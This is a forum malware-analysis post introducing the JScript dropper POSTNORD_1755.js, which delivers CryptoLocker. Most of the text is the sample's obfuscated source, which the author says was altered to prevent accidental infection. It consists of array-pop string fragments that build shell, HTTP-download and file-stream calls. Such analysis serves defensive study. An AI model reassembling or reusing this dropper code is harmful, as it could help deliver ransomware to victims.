Malware Analysis POSTNORD_1755.js - error on the path/name - payload: CryptoLocker

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/18-11-16-10.65618/
Thanks to @silversurfer

POSTNORD_1755.js - 8/54

Why this sample ?
I have never shown this sample here.
Easy method used for obfuscation, but it makes its job.
One error inside that makes the payload be download in the bad folder with a bad name (from my point of view :D)

1) What it looks like :

As usual, I made some modification on the spoiler part to avoid "copy-paste => save => run => infection :p

Advice : look at this spoiler at least one time :)
Array.prototype.wuqjy = function () {
return this.pop();
}
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();
var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();
var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();
var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();
var uryld9 = [7721, 5600, 9959, 9557, 513, 8540, 6909, 6226, 3840, 9465, 9851, 7610, 2451, ");"].wuqjy();
var ukizahup4 = [2892, 6548, 109, 6983, 137, 783, 435, 808, 471, 7001, 9282, 5384, 6230, 3585, 4533, 5414, 6287, "ru"].wuqjy();
var yninexi7 = [7214, 5056, 3743, 3532, 4544, 7996, 5099, 3606, 7755, 2488, 1909, 4046, 2278, 6415, 717, 1592, "Fil"].wuqjy();
var exmatdylju3 = [9226, 5243, 3107, 6231, 771, 8379, 4264, 4704, 7542, 8131, 8769, 5649, 4216, 2120, 9255, "on"].wuqjy();
var xmeglufhowceg7 = [8093, 5650, 5381, 2750, 1925, 1710, 4756, 5413, 4773, 9648, 4535, 1657, 3576, 8833, 5443, 7999, "te"].wuqjy();
var yxyreqqybqu9 = [403, 8144, 7225, 9796, 9046, 9620, 9630, 2721, 4191, 3588, 773, 3451, 770, 9687, "th"].wuqjy();
var esadk1 = [4834, 2525, 5466, 2893, 1193, 2132, 3648, 2729, 7214, 2649, 716, 7347, 2835, "re"].wuqjy();
var ecvoxza7 = [5307, 9429, 1361, 6036, 8411, 3274, 335, 3572, 528, 8873, 5536, 8322, 6986, 6050, 9640, "ku"].wuqjy();
var yvzune0 = [4214, 6944, 5390, 8754, 8427, 2117, 7339, 2937, 2583, 7864, 8738, 2387, "rw"].wuqjy();
var dsergy3 = [1788, 5565, 3710, 7725, 3976, 6884, 7960, 7449, 7312, 6834, 2985, 5634, 3820, 8936, 5275, 7002, "1."].wuqjy();
var ivwibs4 = [9446, 2570, 9503, 3418, 8657, 9190, 6624, 8791, 2788, 6705, 1103, 8868, 9211, 9509, 9649, 3497, "dy"].wuqjy();
var padypot8 = [2394, 9031, 2119, 3498, 9645, 3180, 5816, 3286, 2652, 4568, 2449, 9148, 4874, 2885, 3984, 9483, 1404, "/t"].wuqjy();
var ecoclu9 = [5640, 6943, 6027, 7022, 8121, 7384, 485, 1636, 2248, 1793, 3781, 4421, 7961, 9640, 759, 548, 7655, 6689, "g."].wuqjy();
var yqryzpet6 = [4644, 3037, 1296, 923, 4270, 2484, 4059, 6097, 749, 3901, 6027, "uj"].wuqjy();
var uhvaj9 = [8934, 5087, 8963, 6648, 4199, 1070, 4227, 7354, 3635, 1117, 3911, 4408, 810, 4564, 9548, 3035, 3396, 3038, 473, "To"].wuqjy();
var abforepimu3 = [9314, 8304, 166, 1968, 9573, 6267, 956, 5129, 3972, 726, 8431, "Ge"].wuqjy();
var afoba9 = [5993, 9919, 3276, 894, 8966, 9712, 8649, 2710, 4490, 313, 6944, 1495, 4611, 2852, 5234, "em"].wuqjy();
var sumguz0 = [1525, 5005, 6071, 6808, 1086, 8379, 984, 2486, 5806, 1379, 3612, 8604, 4730, 3818, 5793, 6781, 3134, 6008, "r "].wuqjy();
var yldic0 = [5833, 5461, 4477, 2267, 1281, 9405, 4065, 370, 2431, 2873, 8254, 3485, 2054, 6915, 4640, 7892, 7127, 228, 8531, 1306, " i"].wuqjy();
var xbojemkamd7 = [894, 9515, 4951, 6635, 453, 6253, 7581, 1255, 5172, 7940, "Sh"].wuqjy();
var muru4 = this;
var imgutg9 = [1546, 6333, 7933, 3592, 7864, 6154, 2107, 3049, 2691, 8816, 2698, 9027, 4025, 6235, "Spe"].wuqjy();
var infuru9 = [292, 8959, 9973, 5654, 6374, 5326, 9890, 6332, 6116, 4466, 3209, 8533, 6725, 5278, "n/"].wuqjy();
var ipuhl8 = [3622, 4489, 5370, 1020, 2351, 253, 6787, 2300, 7342, 4329, 5697, 6279, 4532, 5500, "pN"].wuqjy();
var gulmul6 = [9946, 6854, 1403, 8908, 2810, 1299, 6686, 1365, 222, 8389, 6056, 170, 687, 4630, "lFo"].wuqjy();
var ofylygso6 = [8992, 5348, 4093, 953, 3644, 7742, 1573, 6167, 4665, 4887, 9218, 8117, 1909, 2622, 7500, 5361, 6239, 2352, 5471, "HT"].wuqjy();
var yjanugr2 = [2958, 5422, 4626, 3862, 4665, 5234, 8208, 5644, 6722, 913, 1122, 6981, 3637, 3174, 2994, 3291, 6066, 9257, "2"].wuqjy();
var eplivqyp5 = [6823, 1831, 677, 8190, 7609, 5674, 3703, 976, 6909, 5698, 3844, 8672, 6431, 8463, 3623, "ret"].wuqjy();
var ysispereqn7 = [265, 1568, 9400, 3278, 450, 8688, 978, 9743, 1193, 1502, 5520, 7973, 7171, 1756, 2951, 3102, 697, 955, "di"].wuqjy();
var aramigvyww7 = [662, 2877, 605, 9159, 1427, 9030, 8629, 4883, 9554, 8397, 7393, 9187, 253, 6369, 5463, 3369, 7997, 7011, "\\'"].wuqjy();
var lovmo1 = [7533, 474, 2153, 9419, 6027, 3028, 4462, 4315, 7140, 7065, "ou"].wuqjy();
var yjyk7 = [2808, 1697, 8835, 6994, 591, 7224, 1050, 6581, 7954, 3481, 4979, 9176, "in"].wuqjy();
var fxifuskopup2 = [1823, 2988, 1658, 9821, 4348, 3152, 4206, 6698, 2947, 2231, 6326, 7292, 3872, 9949, 6484, 5177, ".c"].wuqjy();
var utwihupos9 = [8805, 9856, 1838, 3325, 3491, 9223, 3814, 9325, 2543, 1322, 4141, 9453, 9129, 2718, 9327, 9857, 5287, 3408, "')"].wuqjy();
var nynozkawvi3 = [5489, 5122, 4213, 2717, 8068, 9904, 2970, 3870, 408, 5096, 1679, 7029, 3681, 4296, 8331, " ="].wuqjy();
var ajnyti1 = [1463, 4545, 2337, 7203, 8010, 4739, 5242, 6134, 6040, 1673, 5050, 2270, 216, 8367, 8943, 3804, 7727, "e /"].wuqjy();
var ypydbahs0 = [5195, 5884, 2373, 1032, 709, 6616, 1382, 7310, 6881, 4337, 224, 4198, 6205, 4701, 2172, 4974, "ne"].wuqjy();
var ikyl8 = [2196, 620, 770, 405, 4471, 6052, 775, 3393, 6649, 385, 2222, "of"].wuqjy();
var kvuzypafek8 = [6889, 3762, 9370, 1697, 4343, 2587, 8764, 4477, 548, 7644, 6254, 1868, "eam"].wuqjy();
var yjqek3 = [9643, 4075, 2448, 7640, 8636, 5486, 3025, 5610, 8941, 7408, 9453, 3323, 2869, 4296, 6870, "sp"].wuqjy();
var ejbuzopydru9 = [5839, 3981, 6900, 5856, 7136, 9591, 7683, 4338, 4560, 5926, 2157, 1021, 6784, 6274, 8361, 6004, 3550, 1095, 8951, "ste"].wuqjy();
var qgozebxaz2 = [7752, 1967, 4656, 372, 1337, 1183, 3116, 7817, 7805, 1794, 6925, 7231, 154, 2229, 8200, 1833, 498, 5303, 5348, "pti"].wuqjy();
var duzegcudirb7 = [2446, 529, 5505, 2755, 5525, 7085, 9685, 9107, 1382, 8016, 6452, 8747, 5985, 8209, 3951, 5382, 469, 8921, " h"].wuqjy();
var adjyfezjic1 = [7730, 3237, 6255, 5191, 6725, 2628, 6661, 4708, 8831, 5909, 8530, 1299, 8984, 1600, " '"].wuqjy();
var tazomv2 = [237, 7483, 7228, 3046, 5790, 352, 5802, 504, 2225, 7808, 6721, 8585, 2717, 1401, "u1"].wuqjy();
var iwzelpanon9 = [3016, 9849, 1707, 5836, 4824, 4342, 449, 6701, 365, 3055, "> "].wuqjy();
var kidrypni0 = [4954, 6646, 9819, 4910, 8501, 9010, 2489, 8997, 3765, 834, 3996, 2129, 1537, 1734, 9830, 6568, "typ"].wuqjy();
var upewekpuxb3 = [2858, 7941, 4595, 3491, 3461, 5369, 2582, 4277, 6033, 8358, 7129, 2050, 605, 6610, 6841, 1432, 5194, 509, 2319, "e"].wuqjy();
var ewsizka1 = [1833, 6047, 132, 9516, 9684, 5302, 3333, 6041, 2877, 816, 1803, 9741, 6045, 4824, 1150, "Sc"].wuqjy();
var yqpemeropi2 = [3384, 279, 8865, 7689, 857, 7978, 336, 3186, 9778, 259, 9875, 7398, 7861, 4882, 5866, 9949, 7188, 7541, "em"].wuqjy();
var yqasoksahbe6 = [9147, 3776, 3107, 6798, 1217, 8112, 2431, 1306, 6182, 1362, 5609, 4867, 6283, 1250, 1121, "ti"].wuqjy();
var ezxityzw3 = [8808, 3316, 3462, 5141, 1249, 6954, 3006, 7304, 8961, 5955, 9895, 7777, 8554, 8923, 1803, 4790, 9947, 2298, "cia"].wuqjy();
var ijecu4 = [9915, 8195, 3769, 1349, 4782, 3546, 6871, 4297, 7396, 5549, 5952, 4928, 6933, 3243, 5798, 2315, 6205, 4668, "pt"].wuqjy();
var isbuqid0 = [6005, 7762, 1912, 3979, 4934, 3568, 6831, 7936, 4166, 7686, 3717, 1663, 7968, 3510, 4209, 5225, "fi"].wuqjy();
var qxicnyhnylobd5 = [7709, 9087, 6940, 8994, 6250, 5285, 5513, 3276, 1028, 5655, 5536, 4833, 5727, 4904, 6047, 7488, "wr"].wuqjy();
var tiwel6 = [6523, 9999, 3270, 4614, 1385, 7162, 8345, 6518, 7026, 5742, 241, 2359, 3905, 172, 9368, 1313, 1861, "t("].wuqjy();
var havgutjyg3 = [4962, 9040, 3828, 9003, 8493, 2958, 1721, 7821, 2816, 6909, 1230, 5493, 3785, 5978, 2251, 2809, 3622, "; "].wuqjy();
var lwivy9 = [129, 4938, 3351, 6184, 6943, 6598, 9961, 4549, 9806, 3396, 2569, 1653, 3640, 6715, 7141, 3350, "ar"].wuqjy();
var oquxab8 = [2683, 2219, 5554, 2658, 163, 1936, 4912, 8580, 7351, 5813, 5300, 2656, 3725, 3869, 2985, 4103, 3135, "jo"].wuqjy();
var ivofaxcoxe7 = [9305, 1633, 8548, 7853, 5920, 1640, 437, 6682, 116, 1985, 7792, 4602, 1030, 6016, 4348, 581, 2700, 7856, "de"].wuqjy();
var kaprizzyri5 = [5072, 7719, 9452, 1209, 5234, 7453, 9903, 7650, 1559, 7212, "MS"].wuqjy();
var xixjyznurev9 = [1321, 3210, 6845, 3826, 2625, 104, 8808, 8587, 8792, 5418, 5118, "t';"].wuqjy();
var ithiqcumi7 = [5719, 2409, 9697, 4377, 1599, 6322, 3169, 4288, 3027, 4172, 3156, 2239, 3681, "Sc"].wuqjy();
var ynyvte2 = [2243, 5125, 4681, 5834, 2841, 5772, 6132, 9569, 2172, 3769, 1545, 6236, 6148, "am"].wuqjy();
var vehidk1 = [6183, 7406, 302, 3623, 5726, 8582, 1548, 9907, 4028, 7602, 2906, 3439, 3460, 153, 3886, 9758, 5515, 4656, 4273, "id"].wuqjy();
var xjuhpivsizi2 = [2871, 3268, 3848, 6249, 2428, 9660, 7874, 896, 583, 3545, 9773, 4297, 1255, 9493, 1001, 2494, 9833, 3675, 4571, "ng"].wuqjy();
var ysyfazs0 = [5769, 3676, 1946, 3505, 3921, 6607, 3501, 4204, 9366, 833, 160, 1351, 7730, 8361, 7503, 404, 649, "en"].wuqjy();
var jyfanynp1 = [7611, 4438, 306, 7008, 3142, 7137, 8377, 3611, 9814, 2248, 6261, 184, 7666, 5726, 3673, 9022, 3000, 8894, 1631, 6293, ";"].wuqjy();
var tbipicma2 = [5093, 622, 1858, 1691, 1613, 6881, 437, 4298, 5685, 3506, 4945, 4130, 7234, 6040, 231, 7651, 6648, 9279, 339, 9209, "le"].wuqjy();
var igzozjed9 = [5662, 5427, 2513, 2159, 6858, 5858, 1890, 4331, 2081, 2337, 3507, 7945, 8730, "pt"].wuqjy();
var holjuzmiwgi0 = [6674, 7651, 6463, 5572, 3646, 7600, 8766, 2453, 1406, 5255, 9889, 1620, 7404, 7772, 4046, 1106, 6290, 8432, 8005, 8951, "em"].wuqjy();
var hsyfcytnivgo8 = [4304, 9623, 3381, 8913, 8454, 9191, 7443, 9653, 8175, 8944, 1445, 6521, 1669, 2203, 5532, 2757, 5610, "')"].wuqjy();
var ovaphojsi0 = [9551, 4470, 9916, 913, 9980, 4783, 7096, 1230, 5805, 3311, 9666, 279, 1779, "on"].wuqjy();
var efretfagdo8 = [8309, 591, 9950, 188, 5526, 3336, 8431, 9676, 6075, 2914, 9138, 4584, 8663, 8687, 1941, 3380, 3551, 189, 2071, "n "].wuqjy();
var ifxus9 = [9207, 9332, 4045, 3911, 6875, 2177, 2681, 2524, 6293, 4702, 1780, "se"].wuqjy();
var hivelg1 = [243, 6867, 1095, 5533, 1331, 4826, 4734, 104, 9266, 8400, 8326, 6742, 5463, 9585, 4591, 3619, "le"].wuqjy();
var ovtodep0 = [9136, 1468, 4971, 5198, 7658, 131, 7884, 6698, 3557, 4458, 3280, 7828, 5424, 7121, 4460, "t"].wuqjy();
var tihu0 = [9215, 5825, 4934, 200, 8211, 740, 1480, 1824, 9245, 6110, 5542, 5038, 2891, 8577, 1046, "ho"].wuqjy();
var axwowarogd5 = [1121, 1819, 489, 2604, 9415, 3259, 5082, 6061, 8787, 6610, "jec"].wuqjy();
var ijlovl1 = [4273, 3930, 8381, 3639, 9106, 633, 7439, 8320, 8380, 7924, 4280, 5445, 6154, 2999, 9411, 5857, 7246, 546, 6398, "sp"].wuqjy();
var vnavuxazask7 = [4881, 3624, 2362, 3238, 4008, 2620, 9370, 6526, 2843, 6579, "cri"].wuqjy();
var ocyhbyti2 = [4665, 2325, 9982, 6711, 6696, 3504, 3992, 8521, 6829, 8824, 1905, 7367, 4435, 2067, 6631, 3727, 6044, 6915, "L2"].wuqjy();
var gihqokl4 = [4878, 7766, 3316, 9261, 9797, 246, 5495, 9145, 2573, 182, 3049, 2287, 5931, 4090, 6214, 8443, 3628, 2326, " ="].wuqjy();
var iqedoca8 = [2855, 5841, 938, 1401, 1046, 901, 8919, 458, 4703, 639, 7364, 9928, "t."].wuqjy();
var mmuvpafyp4 = [6461, 2886, 1124, 7314, 2077, 4735, 1879, 5034, 3386, 8343, 4250, 2838, 4482, 9461, "ur"].wuqjy();
var ysuxgyxd4 = [9158, 6648, 5534, 8001, 6413, 2335, 9597, 1203, 714, 1160, 2418, 3641, 9472, 8752, 9162, 6595, 405, ":/"].wuqjy();
var cypewi6 = [2179, 2927, 4644, 5819, 1262, 4692, 9438, 7094, 5301, 3387, 2303, 1300, 6692, 9291, 6668, 6942, 8975, 8953, 5142, 2765, "nt"].wuqjy();
var oqahboc3 = [2059, 487, 7849, 7252, 5046, 930, 185, 8242, 9297, 5944, 7048, 6706, 9111, 5308, 7339, 5148, 7764, 4841, 9885, 1758, "ku"].wuqjy();
var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();
var ugyctarno4 = [5331, 6967, 7508, 4144, 7081, 8344, 3391, 9182, 6546, 4285, 8894, 8389, 4055, 6089, 829, 2531, 8397, 1321, "\\W"].wuqjy();
var jcutxo0 = [4890, 9623, 4983, 9654, 4457, 7409, 5120, 7251, 8502, 7153, 899, 1231, 4367, 3448, "at"].wuqjy();
var eglogn5 = [4212, 8992, 1337, 3598, 3213, 1382, 2908, 8306, 3124, 2855, 4713, 1973, 2106, 6317, 6459, 4908, 4680, 5178, 651, "dk"].wuqjy();
var ruhycorylr1 = [1810, 7514, 8014, 4748, 8710, 8838, 8918, 1195, 2897, 5016, 1845, 6699, 1044, 8607, 301, 2896, "fe"].wuqjy();
var aqloxhe5 = [4482, 306, 3204, 6210, 4104, 5960, 950, 2299, 4659, 8899, 8391, 891, "cmd"].wuqjy();
var donxopwoki8 = [9204, 7006, 3059, 9684, 7783, 8339, 4864, 5770, 828, 8981, 2013, 4298, 5161, 7253, 8638, "id"].wuqjy();
var adbimgunyddi7 = [5299, 3006, 3893, 4386, 6296, 6122, 9304, 3676, 4565, 2766, 4584, 5234, "Sc"].wuqjy();
var ycajuve7 = [4461, 308, 4627, 4035, 6475, 5483, 9064, 447, 6110, 7496, "tF"].wuqjy();
var cpydetselap4 = [4807, 3749, 7089, 6678, 8289, 8825, 1742, 3484, 3898, 6022, 5877, 2262, 338, 5618, 1313, 3157, 2735, 3337, 7660, "nt"].wuqjy();
var kifsi4 = [5807, 4186, 4178, 8465, 8548, 4386, 3092, 2583, 862, 8475, 1648, 1209, 4586, 9045, 8223, 9745, 9551, 6684, "ol"].wuqjy();
var pescumpu5 = [4085, 8167, 971, 9766, 6636, 3740, 7066, 1386, 8833, 332, 9277, 2353, 5001, 4225, 1587, 2544, 4397, 9150, 3285, 1942, "ex"].wuqjy();
var uxnovyra9 = [7327, 366, 5623, 9386, 7125, 1481, 1277, 1456, 3462, 3515, 4864, 1408, 2245, 2272, 6268, "in"].wuqjy();
var sjefecor1 = [9326, 3180, 8695, 5702, 6228, 4548, 8096, 3741, 3509, 9022, 7880, 7650, 7441, 5104, 5633, 189, 8070, 8930, 4403, 8685, "nc"].wuqjy();
var duhjuxolh9 = [515, 7453, 6565, 4999, 6117, 5252, 6840, 9397, 8703, 6930, 1468, 569, 2777, 3871, 2750, " 9"].wuqjy();
var upukydsaz3 = [3442, 8587, 9040, 351, 9717, 4534, 4037, 5695, 6685, 6746, "va"].wuqjy();
var yvfijgeruqno3 = [9123, 7626, 9529, 7133, 2366, 4772, 3268, 8306, 6346, 8218, 576, 6463, 6586, 9419, 267, "c "].wuqjy();
var mjydgyjyksus8 = [1633, 4990, 8408, 315, 213, 7733, 6786, 7084, 4177, 7954, "Ob"].wuqjy();
var cvomodu5 = [6516, 1542, 1366, 6318, 3264, 9128, 2828, 4093, 3623, 9645, 5310, 2592, 4998, 3893, 255, 1249, 2220, 2943, 1592, 3874, "n"].wuqjy();
var abyhbo1 = [7167, 233, 7960, 8879, 1877, 1420, 6351, 2803, 4189, 2572, "Str"].wuqjy();
var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();
var obejnog7 = [1237, 4213, 3681, 4868, 6448, 8986, 5867, 571, 8297, 1169, 9523, 7314, 2888, 9710, 704, 1423, 4338, 8657, "Na"].wuqjy();
var sdoscetnecy9 = [4592, 2306, 5995, 7284, 8890, 9961, 4005, 3175, 6834, 4066, 821, 3760, 7913, 8126, 6103, 6417, 9704, " ="].wuqjy();
var izfep6 = [3500, 1763, 4337, 9805, 8383, 1441, 6571, 3748, 7989, 2145, 1225, 6168, 7920, 1421, 6403, 6730, 2294, 1809, "5)"].wuqjy();
var ymizd3 = [6509, 928, 4494, 6916, 1317, 8968, 5353, 8583, 7663, 6251, 8327, "ope"].wuqjy();
var ezlajvelevny5 = [6887, 7209, 471, 1309, 370, 3780, 2991, 7277, 1559, 5242, 4085, 9733, "Sa"].wuqjy();
var kxatdohs5 = [2040, 147, 606, 6417, 595, 8150, 2672, 2363, 2146, 1631, 8220, 8514, 5184, 6536, 6809, 9649, 6436, 5208, "Get"].wuqjy();
var izywo5 = [4069, 8176, 5250, 5814, 4875, 6194, 4422, 5077, 8990, 1898, 3430, 7943, 6190, 418, 5302, "2."].wuqjy();
var egkyrexvovt1 = [6037, 285, 1499, 6129, 9124, 1890, 2127, 9044, 8308, 2908, 8898, 5995, 1236, 3293, 8806, 3806, "th"].wuqjy();
var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530, "it"].wuqjy();
var dbynciseq9 = [8648, 8578, 7073, 2118, 7894, 6231, 2343, 8905, 6079, 952, 9191, 3711, 4565, 3056, 8650, 6563, 9215, "et"].wuqjy();
var cumcifulwa2 = [1248, 2927, 5990, 2769, 1753, 1383, 8187, 2913, 247, 9638, 1236, 9303, 9327, 2920, 4975, 2735, 4612, 1976, 6022, 2705, " "].wuqjy();
var iwula5 = [1872, 4142, 3690, 7716, 1191, 397, 6827, 6399, 7636, 1976, 4163, 2478, 1861, 5822, 6312, 5798, ".N"].wuqjy();
var rodhyciftanz7 = [5103, 7394, 9816, 413, 9886, 4814, 4207, 141, 5964, 6328, 2985, 7457, 202, 4664, "GE"].wuqjy();
var qefrinilnem6 = [9214, 3339, 8954, 1581, 6450, 1260, 5462, 5745, 8536, 2450, 5739, 3947, 5972, "bj"].wuqjy();
var ejiredla7 = [4381, 1139, 998, 5496, 3729, 6531, 5269, 7745, 6515, 9879, 7736, 344, 4761, 9995, 383, 2858, 7331, 5955, 1984, 6996, "Op"].wuqjy();
var ahhavuho3 = [9213, 705, 3586, 6598, 1091, 5122, 8746, 2784, 8804, 3168, 746, 8444, 3828, "Fi"].wuqjy();
var zjafoxregaw9 = [7997, 7611, 5845, 7442, 4988, 4138, 652, 3099, 6329, 5791, 2648, 254, "1"].wuqjy();
var gficju9 = [312, 4054, 2405, 1452, 4189, 2822, 7194, 6396, 8114, 7371, 3526, 7785, 6103, 1452, 3026, 4823, 5164, 9381, "Da"].wuqjy();
var qexed0 = [2308, 972, 5005, 2100, 398, 9054, 9108, 2088, 6466, 6642, 1460, 2752, "'C"].wuqjy();
var skujpe0 = [2412, 2146, 4471, 3522, 7281, 1924, 3425, 4931, 3384, 637, 5610, 261, 9263, 9291, "XM"].wuqjy();
var qmywha6 = [1294, 7567, 9003, 440, 140, 9086, 3389, 2328, 5018, 7380, 8442, 3462, 1008, 769, 7300, 4189, 5862, 557, " W"].wuqjy();
var fwulu3 = [3421, 6133, 789, 3340, 9310, 1583, 2307, 9023, 233, 4917, 3513, 446, 1861, 4909, 4958, "Ob"].wuqjy();
var nbavligw4 = [7935, 4261, 6928, 7966, 2145, 3627, 1524, 6503, 6807, 9253, 1928, 3929, 3714, 1199, 7300, 4338, 6607, 6944, 2453, "Cr"].wuqjy();
var ncunridc4 = [8741, 6685, 9823, 5070, 2476, 2472, 5225, 3237, 1138, 5221, 2407, 1126, 8504, 3891, 5935, 232, "Re"].wuqjy();
var jeripono8 = [1214, 4808, 7572, 7944, 3633, 9377, 5311, 7968, 1445, 1942, ".X"].wuqjy();
var bwipodjofvo2 = [7086, 8451, 2569, 7686, 478, 5572, 639, 7306, 2800, 4981, 6678, 4326, 8473, 9236, 7694, 2928, 6236, "0"].wuqjy();
var ncaxa3 = [4413, 3576, 2459, 4566, 6151, 2527, 2285, 351, 1780, 4829, 9224, 2701, 4179, 7488, 817, 7446, 1105, 1508, 6454, 2863, "/w"].wuqjy();
var jwiwga6 = [2718, 2404, 3766, 9405, 9389, 7844, 7359, 4444, 7315, 5009, 2084, 2228, "je"].wuqjy();
var pycozbyw4 = [9759, 5017, 8538, 4646, 4235, 6655, 6456, 6758, 4156, 1818, 2997, 6408, 7189, 892, 3087, 1783, 6090, 4483, 3462, "TP"].wuqjy();
var equpqu9 = [3051, 4284, 436, 3390, 2748, 2524, 6622, 4404, 678, 9112, 2646, 2428, 1899, 9923, 6789, 7619, 7702, 5006, 8468, 2187, "tT"].wuqjy();
var uwjecab4 = [2570, 2439, 5174, 6092, 6828, 545, 7012, 9079, 699, 3800, 1380, 7941, 8029, 6977, 4220, 2561, 2478, 6430, "am"].wuqjy();
var cwilo7 = [3603, 9854, 5092, 6572, 8623, 8395, 9508, 6064, 2796, 2968, 8515, 8245, 6451, 5050, 1285, 4819, "pt"].wuqjy();
var mrypxolnyvy4 = [3717, 4529, 6959, 948, 4584, 9088, 9049, 6318, 9487, 4353, 1666, 9061, 9758, "ng."].wuqjy();
var egpemfecnu6 = [8760, 2145, 1857, 5387, 5300, 3488, 4110, 9249, 4636, 7686, 9833, 6137, 7514, 8000, 8793, 2515, 4106, 7309, "l"].wuqjy();
var vifahu3 = [3544, 8706, 6680, 6267, 5900, 3077, 4381, 3271, 6503, 2167, 9275, 7855, 5093, 4098, 3020, 4475, 7926, 3172, "te"].wuqjy();
var iglylfanwac2 = [4138, 7591, 2673, 8562, 9542, 4439, 9755, 7236, 7977, 5732, 7027, 2135, "fe"].wuqjy();
var nzexxof6 = [329, 4174, 4482, 2131, 6929, 6234, 9347, 2427, 4686, 3903, 9713, 5848, 1141, "e2"].wuqjy();
var tatnynhemku0 = [1819, 7691, 5711, 508, 4997, 9104, 8456, 3467, 1632, 8546, 5204, 9963, 7617, 9412, 3901, "ip"].wuqjy();
var bigcu1 = [6581, 6432, 9484, 8663, 8516, 7460, 3588, 6373, 1569, 7982, 6302, 9248, 3922, 2468, 3174, 3070, 592, 9361, 1224, "=="].wuqjy();
var adtise6 = [4285, 1176, 7602, 3245, 1150, 3257, 9519, 6376, 3147, 5852, 2493, 7513, 8961, 1026, 4238, 4240, 8418, 7224, 7982, 2747, "fu"].wuqjy();
var qnafoxhamw0 = [441, 8014, 1964, 8517, 3264, 7679, 3393, 9358, 2102, 8370, 8349, 3901, 1801, 6292, 9991, 2119, 1595, 519, "Ge"].wuqjy();
var btafdudju2 = [5005, 7799, 880, 4985, 2583, 7877, 6115, 8288, 1188, 5781, 8468, 2868, 7300, 4750, 5193, 3266, 7991, 3520, "s."].wuqjy();
var duvywan3 = [9412, 3059, 9456, 3109, 8843, 9765, 6801, 1695, 4790, 8378, 1562, 1314, 3027, 8412, "tp"].wuqjy();
var fagenymdyvp7 = [2444, 2565, 2772, 6726, 5737, 9175, 8794, 5012, 7031, 3888, 9010, 9951, 8263, 6936, 3123, 8074, 459, "(2"].wuqjy();
var suvdeccofhycm4 = [1027, 7484, 3672, 4992, 7754, 6003, 7766, 6008, 9388, 9721, 2923, 4029, 7613, 9951, 4157, 6144, "f("].wuqjy();
var ymigig6 = [233, 1899, 5514, 7425, 5672, 5463, 3909, 849, 253, 2675, 167, 7718, 4200, 9253, 2643, 8972, 1020, 9350, 8264, 8116, "om"].wuqjy();
var tnyqyqfexny8 = [8691, 3804, 9155, 9973, 1115, 6037, 4311, 1240, 235, 517, 5841, 2307, 5391, "w "].wuqjy();
var luhegza6 = [3945, 9700, 8071, 4642, 2067, 2214, 1065, 7908, 5280, 389, 2743, 9877, 5906, 3917, 9717, 7218, 6724, 2850, "cr"].wuqjy();
var igich4 = [7246, 5666, 8659, 6433, 5819, 5028, 1897, 9088, 3025, 8808, 7983, 1154, 9181, 8660, 1254, 5937, 312, ");"].wuqjy();
var xwajapyt1 = [1401, 6854, 8453, 6127, 1589, 8458, 5394, 9890, 6784, 2136, 5353, "Cl"].wuqjy();
var rawjulhyr3 = [9371, 8028, 1742, 9322, 2185, 7787, 580, 876, 5379, 5179, 7986, 2489, 4217, 6243, "sp"].wuqjy();
var nnevo6 = [2850, 1641, 8091, 1386, 3991, 3830, 5233, 9864, 7396, 3722, 5332, 8162, 9930, 7109, 7408, 1789, "ec"].wuqjy();
var fpireldokti4 = [8213, 1314, 2676, 1781, 8045, 613, 5848, 5731, 4230, 7411, 3700, 7641, 1621, 8826, 5393, 5517, 1260, 8863, "ed"].wuqjy();
var ndanoladtu6 = [7325, 334, 5369, 1588, 6213, 4131, 1073, 8530, 8155, 9788, 7281, 7338, 8691, 989, 8046, 2700, "ol"].wuqjy();
var umavl0 = [6953, 8234, 5047, 1736, 1780, 1919, 5934, 9077, 7368, 1886, 4006, 4302, 5029, 9705, "Fu"].wuqjy();
var qtaknobry5 = [5499, 4602, 477, 4639, 1582, 6727, 8584, 4509, 565, 625, 5901, 9804, "su"].wuqjy();
var qvysinpe8 = [9998, 7057, 7502, 2241, 2182, 2184, 7976, 4924, 7856, 4109, 4494, 9929, 7778, 5939, "e "].wuqjy();
var emmyctepedzy3 = [4487, 8063, 9586, 4242, 5300, 7564, 9875, 2327, 9599, 2255, 9351, 265, 7137, 7247, 2653, 1369, 6200, 8987, 5556, "2."].wuqjy();
var xvyhavykta4 = [5259, 264, 7163, 9177, 9124, 2459, 9551, 4843, 1811, 1744, 3459, 7472, 1025, 2869, 6221, "DB."].wuqjy();
var lushevmazsa1 = [7502, 5302, 6511, 5499, 401, 117, 3255, 2790, 1926, 7201, 4968, "eSy"].wuqjy();
var miqo9 = [9352, 2192, 8616, 5760, 9281, 9409, 8748, 1064, 5500, 3232, "ADO"].wuqjy();
var pkihfidonpy7 = [6631, 8964, 5600, 4897, 5849, 7832, 6019, 1828, 3898, 2856, 4740, 8195, "n"].wuqjy();
var ryzkantu5 = [9331, 8347, 7499, 6124, 9793, 4563, 2462, 4901, 9047, 6535, 7855, 3744, 4777, 1663, 4333, 7004, 4398, "st"].wuqjy();
var eworhafsoqk2 = [7495, 8847, 8128, 3472, 2361, 291, 8769, 1803, 5282, 8527, 5461, 7414, 5352, 4335, 9958, 890, "ee"].wuqjy();
var butujuvf0 = [5114, 744, 7631, 7999, 8101, 7734, 2664, 9127, 6237, 2629, 1093, 3041, 9147, 6895, 4452, "T"].wuqjy();
